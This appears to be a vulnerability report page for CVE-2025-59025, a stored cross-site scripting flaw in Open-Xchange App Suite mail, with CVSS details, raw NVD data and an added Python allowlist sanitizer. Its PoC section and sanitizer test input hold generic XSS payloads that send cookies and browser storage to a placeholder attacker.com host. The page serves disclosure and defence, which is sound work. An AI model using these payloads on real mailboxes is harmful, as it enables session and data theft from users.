Security Vulnerability Report
CVE-2025-59025 CVSS 6.1 MEDIUM

CVE-2025-59025

Published: 2025-11-27 10:15:52
Last Modified: 2026-04-15 00:35:42

Description

Malicious e-mail content can be used to execute script code. Unintended actions can be executed in the context of the user's account, including exfiltration of sensitive information. Sanitization has been updated to avoid such bypasses. No publicly available exploits are known.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Reading the vector: no privileges are required (PR:N) because any sender can deliver the message; the victim must open or preview it (UI:R); scope is Changed (S:C), as is usual for XSS, because the vulnerable component is the application that rendered the mail while the impacted component is the victim's browser; the impact is limited to what the injected script can read and do as the logged-in user (C:L/I:L), with no availability impact (A:N).

Configurations (Affected Products)

No CPE configuration data is present in the NVD record (see Raw JSON Data below). Affected versions as listed on this page:

Open-Xchange App Suite < 8.24.0
Open-Xchange App Suite < 7.10.6-rev33

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
Note that the vendor states no publicly available exploit is known and the advisory does not describe the specific sanitizer bypass that was fixed. The payloads below are generic stored-XSS primitives (an event handler, an inline script, a javascript: link) that illustrate the impact class (CWE-79, script execution in the victim's web client when a mail is rendered), not the actual bypass. The attacker.com host and the localStorage keys are placeholders.
html
<!-- CVE-2025-59025 PoC: malicious e-mail content for XSS -->
<html>
<body>
<h3>CVE-2025-59025 XSS PoC</h3>
<p>Send the following HTML as the e-mail body:</p>
<pre>
&lt;img src=x onerror='fetch("https://attacker.com/steal?cookie="+document.cookie)'&gt;
&lt;script&gt;
// exfiltrate the user's session data (localStorage key names are placeholders)
fetch('https://attacker.com/exfil', {
  method: 'POST',
  body: JSON.stringify({
    cookies: document.cookie,
    emails: localStorage.getItem('emails'),
    contacts: localStorage.getItem('contacts')
  })
});
&lt;/script&gt;
&lt;a href="javascript:fetch('https://attacker.com/log?data='+btoa(JSON.stringify(window.sessionStorage)))"&gt;Click me&lt;/a&gt;
</pre>
<p>When the victim previews or opens this e-mail, the script executes.</p>
</body>
</html>
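The fix the advisory describes, updated sanitization of rendered mail HTML, is most robustly done with a parser-driven allowlist rather than a blocklist of known-bad patterns. The following is an added example written for this page, not Open-Xchange code: a small allowlist sanitizer built on Python's standard-library html.parser, run against the decoded payloads from the PoC above plus two scheme-obfuscation variants (an entity-encoded colon and an embedded tab, both of which browsers still treat as javascript:). The tag and attribute allowlists, the function names and the SAMPLE_MAIL_BODY input are assumptions constructed for the example.

```python
"""Allowlist sanitizer for untrusted HTML mail bodies.

Added example for this page, not Open-Xchange code. Uses only the standard
library; the allowlists below are assumptions chosen for the demonstration.
"""
import re
from html import escape
from html.parser import HTMLParser

# Everything not listed here is dropped (tags) or stripped (attributes).
ALLOWED_TAGS = {
    "p", "br", "b", "i", "u", "em", "strong", "a", "img", "pre", "blockquote",
    "h1", "h2", "h3", "ul", "ol", "li", "table", "tr", "td", "th", "div", "span",
}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "width", "height"}}
URL_ATTRS = {"href", "src"}
# Elements whose *content* is discarded, not only their tags.
DROP_CONTENT_TAGS = {"script", "style", "iframe", "object", "embed", "svg", "math"}
VOID_TAGS = {"br", "img"}
SAFE_SCHEMES = {"http", "https", "mailto", "cid"}  # cid: = inline attachment
_SCHEME_RE = re.compile(r"([a-zA-Z][a-zA-Z0-9+.-]*):")


def safe_url(value: str) -> bool:
    """True if the URL is relative or uses an allowlisted scheme.

    Control and whitespace characters are stripped first because browsers
    ignore them inside the scheme ('java\\tscript:' still runs as javascript:).
    Entity forms such as '&#58;' were already decoded by the parser.
    """
    cleaned = re.sub(r"[\x00-\x20\x7f]", "", value)
    m = _SCHEME_RE.match(cleaned)
    return m is None or m.group(1).lower() in SAFE_SCHEMES


class MailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # > 0 while inside a DROP_CONTENT_TAGS element

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag in DROP_CONTENT_TAGS:
                self.skip_depth += 1
            return
        if tag in DROP_CONTENT_TAGS:
            self.skip_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            return  # unknown tag dropped, its text content survives
        kept = []
        for name, value in attrs:
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, ()):
                continue  # event handlers never pass the allowlist
            value = value or ""
            if name in URL_ATTRS and not safe_url(value):
                continue  # javascript:, data:, vbscript: ... removed
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag in DROP_CONTENT_TAGS:
                self.skip_depth -= 1
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

    # Comments, doctypes and processing instructions fall through to the
    # base-class no-op handlers and are therefore dropped.


def sanitize_mail_html(html: str) -> str:
    parser = MailSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


# Constructed sample mail body: the PoC payloads from this page, decoded, plus
# two obfuscated javascript: links and one legitimate link.
SAMPLE_MAIL_BODY = (
    "<p>Hello</p>"
    "<img src=x onerror='fetch(\"https://attacker.com/steal?cookie=\"+document.cookie)'>"
    "<script>fetch('https://attacker.com/exfil', {method: 'POST', body: document.cookie});</script>"
    "<a href=\"javascript:fetch('https://attacker.com/log?data='+btoa(JSON.stringify(window.sessionStorage)))\">Click me</a>"
    "<a href=\"JaVaScRiPt&#58;alert(1)\">entity-obfuscated</a>"
    "<a href=\"java\tscript:alert(1)\">tab-obfuscated</a>"
    "<a href=\"https://example.com/\">legitimate link</a>"
)


if __name__ == "__main__":
    print(sanitize_mail_html(SAMPLE_MAIL_BODY))
```

Two points the example makes that a regex filter misses: attribute values are entity-decoded by the parser before the scheme check, so `javascript&#58;` cannot slip through, and the contents of script, style, svg and iframe elements are discarded rather than just their tags. A production sanitizer also has to cover CSS (style attributes are not allowed here at all) and should be differential-tested against the browser's own parser, since parser differentials between sanitizer and renderer are a common source of sanitizer bypasses.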

References

https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2025/oxas-adv-2025-0003.json (Open-Xchange CSAF advisory, as cited in the NVD record below)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-59025",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-27T10:15:51.830",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Malicious e-mail content can be used to execute script code. Unintended actions can be executed in the context of the users account, including exfiltration of sensitive information. Sanitization has been updated to avoid such bypasses. No publicly available exploits are known"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2025/oxas-adv-2025-0003.json",
        "source": "[email protected]"
      }
    ]
  }
}